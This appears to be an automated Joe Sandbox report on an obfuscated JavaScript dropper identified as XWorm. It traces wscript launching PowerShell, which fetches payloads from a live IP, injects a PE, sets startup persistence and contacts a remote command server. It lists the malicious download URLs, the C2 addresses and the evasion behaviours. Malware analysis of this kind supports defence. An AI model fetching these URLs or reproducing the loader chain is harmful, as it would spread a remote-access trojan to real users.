            Source: wscript.exe, 00000000.00000002.1363143006.0000028B3BBD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1359382525.0000028B3BBD0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1355786828.0000028B399B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1363053568.0000028B3BBA0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1357807520.0000028B399B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1361779423.0000028B399B5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1276614530.0000028B3BBD0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 0000000C.00000002.2460528672.00000000012E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Windows\System32\wscript.exeNetwork Connect: 176.65.144.3 80Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeMemory written: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\WTRTRWFSHS.ps1"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe "C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe" Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeProcess created: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe "C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeQueries volume information: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeQueries volume information: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 0000000C.00000002.2477479971.0000000006D20000.00000004.00000020.00020000.00000000.sdmp, JXCJKXCJHKJHXCJHKXCXCJHK.exe, 0000000C.00000002.2460528672.00000000012E0000.00000004.00000020.00020000.00000000.sdmp, JXCJKXCJHKJHXCJHKXCXCJHK.exe, 0000000C.00000002.2460528672.0000000001277000.00000004.00000020.00020000.00000000.sdmp, JXCJKXCJHKJHXCJHKXCXCJHK.exe, 0000000C.00000002.2477479971.0000000006D35000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: JXCJKXCJHKJHXCJHKXCXCJHK.exe, 0000000C.00000002.2460528672.00000000012E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Defender\MsMpeng.exe
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 12.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.2ab9f3c.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.2ab56fb.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.2ab9f3c.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.2ace474.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.2ace474.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000A.00000002.1333571921.0000000002ACE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.2457857484.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.1333571921.0000000002AB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: JXCJKXCJHKJHXCJHKXCXCJHK.exe PID: 5704, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: JXCJKXCJHKJHXCJHKXCXCJHK.exe PID: 7988, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 12.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.2ab9f3c.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.2ab56fb.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.2ab9f3c.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.2ace474.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.JXCJKXCJHKJHXCJHKXCXCJHK.exe.2ace474.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000A.00000002.1333571921.0000000002ACE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.2457857484.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.1333571921.0000000002AB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: JXCJKXCJHKJHXCJHKXCXCJHK.exe PID: 5704, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: JXCJKXCJHKJHXCJHKXCXCJHK.exe PID: 7988, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information52
            Scripting
            Valid Accounts11
            Windows Management Instrumentation
            52
            Scripting
            1
            DLL Side-Loading
            1
            Disable or Modify Tools
            1
            Input Capture
            2
            File and Directory Discovery
            Remote Services11
            Archive Collected Data
            11
            Ingress Tool Transfer
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Exploitation for Client Execution
            1
            DLL Side-Loading
            211
            Process Injection
            1
            Deobfuscate/Decode Files or Information
            LSASS Memory13
            System Information Discovery
            Remote Desktop Protocol1
            Input Capture
            1
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts2
            PowerShell
            2
            Registry Run Keys / Startup Folder
            2
            Registry Run Keys / Startup Folder
            41
            Obfuscated Files or Information
            Security Account Manager221
            Security Software Discovery
            SMB/Windows Admin Shares1
            Clipboard Data
            1
            Non-Standard Port
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook32
            Software Packing
            NTDS1
            Process Discovery
            Distributed Component Object ModelInput Capture1
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Timestomp
            LSA Secrets131
            Virtualization/Sandbox Evasion
            SSHKeylogging121
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading
            Cached Domain Credentials1
            Application Window Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Masquerading
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job131
            Virtualization/Sandbox Evasion
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt211
            Process Injection
            /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 1643093 Sample: obfuscated (1).js Startdate: 19/03/2025 Architecture: WINDOWS Score: 100 44 Suricata IDS alerts for network traffic 2->44 46 Found malware configuration 2->46 48 Malicious sample detected (through community Yara rule) 2->48 50 17 other signatures 2->50 8 wscript.exe 1 16 2->8         started        process3 dnsIp4 34 176.65.144.3, 49713, 49717, 80 PALTEL-ASPALTELAutonomousSystemPS Germany 8->34 28 C:\Temp\WTRTRWFSHS.ps1, ASCII 8->28 dropped 52 System process connects to network (likely due to code injection or exploit) 8->52 54 JScript performs obfuscated calls to suspicious functions 8->54 56 Wscript starts Powershell (via cmd or directly) 8->56 58 2 other signatures 8->58 13 powershell.exe 13 8->13         started        file5 signatures6 process7 file8 30 C:\Users\...\JXCJKXCJHKJHXCJHKXCXCJHK.exe, PE32 13->30 dropped 60 Found suspicious powershell code related to unpacking or dynamic code loading 13->60 62 Powershell drops PE file 13->62 17 JXCJKXCJHKJHXCJHKXCXCJHK.exe 15 3 13->17         started        20 conhost.exe 13->20         started        signatures9 process10 signatures11 36 Antivirus detection for dropped file 17->36 38 Multi AV Scanner detection for dropped file 17->38 40 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 17->40 42 Injects a PE file into a foreign processes 17->42 22 JXCJKXCJHKJHXCJHKXCXCJHK.exe 6 17->22         started        process12 dnsIp13 32 178.173.236.10, 49722, 49723, 49724 AS45671-NET-AUWholesaleServicesProviderAU Iran (ISLAMIC Republic Of) 22->32 26 C:\Users\user\AppData\Local\...\X1Client.exe, PE32 22->26 dropped file14

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            obfuscated (1).js21%VirustotalBrowse
            obfuscated (1).js26%ReversingLabsScript-JS.Trojan.Xworm
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe100%AviraTR/AVI.Agent.aebha
            C:\Users\user\AppData\Local\Temp\X1Client.exe100%AviraTR/AVI.Agent.aebha
            C:\Users\user\AppData\Local\Temp\JXCJKXCJHKJHXCJHKXCXCJHK.exe54%ReversingLabsWin32.Backdoor.Xworm
            C:\Users\user\AppData\Local\Temp\X1Client.exe54%ReversingLabsWin32.Backdoor.Xworm
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://176.65.144.3/dev/BRAINNN.ps1Q0%Avira URL Cloudsafe
            http://176.65.144.3/dev/BRAINNN.ps1O0%Avira URL Cloudsafe
            http://176.65.144.3/dev/BRAINNN.ps1su5otI5WCZe1Y%12%020%Avira URL Cloudsafe
            http://176.65.144.3/dev/BRAINN.exe100%Avira URL Cloudmalware
            http://176.65.144.3/c0%Avira URL Cloudsafe
            178.173.236.100%Avira URL Cloudsafe
            http://176.65.144.3/dev/BRAINNN.ps1r0%Avira URL Cloudsafe
            http://176.65.144.3/0%Avira URL Cloudsafe
            http://176.65.144.3/dev/BRAINNN.ps1i0%Avira URL Cloudsafe
            http://176.65.144.3/dev/BRAINNN.ps1100%Avira URL Cloudmalware
            http://176.65.144.3/dev/BRAINNN.ps1K0%Avira URL Cloudsafe
            http://176.65.144.3/dev/BRAINN.exeP0%Avira URL Cloudsafe

            Download Network PCAP: filteredfull

            No contacted domains info
            NameMaliciousAntivirus DetectionReputation
            http://176.65.144.3/dev/BRAINNN.ps1true
            • Avira URL Cloud: malware
            unknown
            http://176.65.144.3/dev/BRAINN.exetrue
            • Avira URL Cloud: malware
            unknown
            178.173.236.10true
            • Avira URL Cloud: safe
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            http://176.65.144.3/wscript.exe, 00000000.00000003.1276614530.0000028B3BBBF000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: safe
            unknown
            http://nuget.org/NuGet.exepowershell.exe, 00000008.00000002.1320594242.00000258107A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1346116332.000002581EF5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1346116332.000002581EE25000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000008.00000002.1320594242.0000025810364000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000008.00000002.1320594242.000002580EF82000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000008.00000002.1320594242.000002580EF82000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://contoso.com/Licensepowershell.exe, 00000008.00000002.1346116332.000002581EE25000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://176.65.144.3JXCJKXCJHKJHXCJHKXCXCJHK.exe, 0000000A.00000002.1333571921.0000000002AAC000.00000004.00000800.00020000.00000000.sdmp, JXCJKXCJHKJHXCJHKXCXCJHK.exe, 0000000A.00000002.1333571921.0000000002A9B000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://contoso.com/Iconpowershell.exe, 00000008.00000002.1346116332.000002581EE25000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://176.65.144.3/dev/BRAINNN.ps1rwscript.exe, 00000000.00000003.1276614530.0000028B3BBBF000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://176.65.144.3/dev/BRAINNN.ps1iwscript.exe, 00000000.00000003.1276614530.0000028B3BBBF000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://github.com/Pester/Pesterpowershell.exe, 00000008.00000002.1320594242.000002580EF82000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://176.65.144.3/cwscript.exe, 00000000.00000003.1276614530.0000028B3BBBF000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://176.65.144.3/dev/BRAINNN.ps1su5otI5WCZe1Y%12%02wscript.exe, 00000000.00000003.1357528885.0000028B3993B000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://contoso.com/powershell.exe, 00000008.00000002.1346116332.000002581EE25000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://nuget.org/nuget.exepowershell.exe, 00000008.00000002.1320594242.00000258107A7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1346116332.000002581EF5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1346116332.000002581EE25000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://oneget.orgXpowershell.exe, 00000008.00000002.1320594242.0000025810364000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://176.65.144.3/dev/BRAINNN.ps1Qwscript.exe, 00000000.00000003.1276614530.0000028B3BBBF000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://aka.ms/pscore68powershell.exe, 00000008.00000002.1320594242.000002580ED51000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://176.65.144.3/dev/BRAINNN.ps1Owscript.exe, 00000000.00000002.1361650157.0000028B399A7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1355833170.0000028B3999C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1356002274.0000028B3999F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1357854813.0000028B399A2000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000008.00000002.1320594242.000002580ED51000.00000004.00000800.00020000.00000000.sdmp, JXCJKXCJHKJHXCJHKXCXCJHK.exe, 0000000A.00000002.1333571921.0000000002A9B000.00000004.00000800.00020000.00000000.sdmp, JXCJKXCJHKJHXCJHKXCXCJHK.exe, 0000000C.00000002.2464253717.0000000002FF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://176.65.144.3/dev/BRAINNN.ps1Kwscript.exe, 00000000.00000002.1363143006.0000028B3BBBE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1276614530.0000028B3BBBF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1359382525.0000028B3BBBD000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://176.65.144.3/dev/BRAINN.exePJXCJKXCJHKJHXCJHKXCXCJHK.exe, 0000000A.00000002.1333571921.0000000002A3B000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://oneget.orgpowershell.exe, 00000008.00000002.1320594242.0000025810364000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs
                                        IPDomainCountryFlagASNASN NameMalicious
                                        178.173.236.10
                                        unknownIran (ISLAMIC Republic Of)
                                        45671AS45671-NET-AUWholesaleServicesProviderAUtrue
                                        176.65.144.3
                                        unknownGermany
                                        12975PALTEL-ASPALTELAutonomousSystemPStrue
                                        Joe Sandbox version:42.0.0 Malachite
                                        Analysis ID:1643093
                                        Start date and time:2025-03-19 14:18:15 +01:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 5m 43s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:15
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • GSI enabled (Javascript)
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:obfuscated (1).js
                                        Detection:MAL
                                        Classification:mal100.troj.spyw.expl.evad.winJS@8/10@0/2
                                        EGA Information:
                                        • Successful, ratio: 66.7%
                                        HCA Information:
                                        • Successful, ratio: 100%
                                        • Number of executed functions: 43
                                        • Number of non-executed functions: 0
                                        Cookbook Comments:
                                        • Found application associated with file extension: .js
                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, sppsvc.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                        • Excluded IPs from analysis (whitelisted): 23.60.203.209, 20.12.23.50, 131.253.33.254
                                        • Excluded domains from analysis (whitelisted): a-ring-fallback.msedge.net, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, c.pki.goog, fe3cr.delivery.mp.microsoft.com
                                        • Execution Graph export aborted for target powershell.exe, PID 3904 because it is empty
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                        TimeTypeDescription
                                        09:19:25API Interceptor8x Sleep call for process: powershell.exe modified
                                        09:19:27API Interceptor2649521x Sleep call for process: JXCJKXCJHKJHXCJHKXCXCJHK.exe modified
                                        13:19:35AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\X1Client.lnk
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        178.173.236.10BRAINNN.ps1Get hashmaliciousXWormBrowse
                                          BRAINN.exeGet hashmaliciousXWormBrowse
                                            176.65.144.3KIM.ps1Get hashmaliciousStealeriumBrowse
                                            • 176.65.144.3/dev/Cooperbuild34.exe
                                            KENT.ps1Get hashmaliciousRemcosBrowse
                                            • 176.65.144.3/dev/kent.exe
                                            VIK.ps1.vir.txt.ps1Get hashmaliciousAgentTeslaBrowse
                                            • 176.65.144.3/dev/DONORIGIN.exe
                                            devil.ps1.vir.txt.ps1Get hashmaliciousAgentTeslaBrowse
                                            • 176.65.144.3/dev/DEV.exe
                                            money.ps1.txt.ps1Get hashmaliciousAgentTeslaBrowse
                                            • 176.65.144.3/dev/moneynew.exe
                                            kim.ps1.txt.ps1Get hashmaliciousStealeriumBrowse
                                            • 176.65.144.3/dev/build22.exe
                                            PO-2513203.Vbs.vbsGet hashmaliciousAgentTeslaBrowse
                                            • 176.65.144.3/dev/believe.ps1
                                            #U4ed8#U6b3e#U6c47#U6b3e#U901a#U77e5.jsGet hashmaliciousRemcosBrowse
                                            • 176.65.144.3/dev/kent.exe
                                            certificate-pdf.jsGet hashmaliciousRemcosBrowse
                                            • 176.65.144.3/dev/MUK.ps1
                                            PO_111101111001.jsGet hashmaliciousAgentTeslaBrowse
                                            • 176.65.144.3/dev/DEV.exe
                                            No context
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            PALTEL-ASPALTELAutonomousSystemPSKIM.ps1Get hashmaliciousStealeriumBrowse
                                            • 176.65.144.3
                                            KENT.ps1Get hashmaliciousRemcosBrowse
                                            • 176.65.144.3
                                            xenbuild.exeGet hashmaliciousRedLineBrowse
                                            • 176.65.144.135
                                            VIK.ps1.vir.txt.ps1Get hashmaliciousAgentTeslaBrowse
                                            • 176.65.144.3
                                            devil.ps1.vir.txt.ps1Get hashmaliciousAgentTeslaBrowse
                                            • 176.65.144.3
                                            money.ps1.txt.ps1Get hashmaliciousAgentTeslaBrowse
                                            • 176.65.144.3
                                            verynicewomenformygirlfriend.htaGet hashmaliciousCobalt Strike, GuLoader, RemcosBrowse
                                            • 176.65.139.88
                                            kim.ps1.txt.ps1Get hashmaliciousStealeriumBrowse
                                            • 176.65.144.3
                                            39h66rab6ub.ps1v.ps1Get hashmaliciousXWormBrowse
                                            • 176.65.144.14
                                            20ibms9ldyp.ps1v.ps1Get hashmaliciousQuasarBrowse
                                            • 176.65.144.14
